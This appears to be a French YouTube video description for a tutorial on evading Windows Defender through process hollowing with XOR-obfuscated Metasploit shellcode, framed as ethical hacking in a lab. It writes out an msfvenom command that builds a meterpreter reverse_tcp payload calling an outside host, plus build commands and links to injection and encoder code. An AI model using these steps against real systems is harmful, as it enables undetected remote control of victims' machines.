UN VIRUS METASPLOIT NON DÉTECTÉ PAR WINDOWS DEFENDER !
Processus Thief
#windows #antivirus #virus Vidéo en français expliquant le principe de contournement de la protection antivirale de Windows Defender via la technique de Process Hollowing avec une injection de shellcode préalablement obfusqué avec un fonction XOR.
Cette vidéo est a vocation instructive. La technique présentée a été utilisée dans le cadre d'un laboratoire dédié à cet effet et n'est pas prévue pour être utilisée en dehors de celui-ci. Je ne pourrais en aucun cas être tenu responsable de la mauvaise utilisation des outils présentés dans cette vidéo.
Le piratage est un délit passible de lourdes sanctions.
Le but de cette chaine youtube est, et restera, le hacking éthique.
Les commandes et les scripts utilisés en détail :
Pour générer un meterpreter Metasploit sous la forme d'un shellcode avec msfvenom : msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=peertube.lestutosdeprocessus.fr LPORT=8080 EXITFUNC=thread -f csharp
Le script XorCoder pour obfusquer son payload avec une fonction XOR : https://github.com/chvancooten/OSEP-Code-Snippets/blob/main/XOR%20Shellcode%20Encoder/Program.cs
Pour créer un nouveau projet DotNet en mode console dans Visual Studio Code : "dotnet new console" Pour compiler le projet DotNet sous la forme d'un seul fichier exécutable intégrant ses librairies : "dotnet publish -p:PublishSingleFile=true -r win-x64 -c Release --self-contained true -p:PublishTrimmed=true"
Le script de Process Hollowing pour injecter notre shellcode dans un processus en stand-by : https://github.com/chvancooten/OSEP-Code-Snippets/blob/main/Shellcode%20Process%20Hollowing/Program.cs
Le lien de mon blog : https://lestutosdeprocessus.fr
Le lien pour rejoindre le serveur Discord : https://discord.gg/JJNxV2h ... https://www.youtube.com/watch?v=CTkbSiOBi58
291390578 Bytes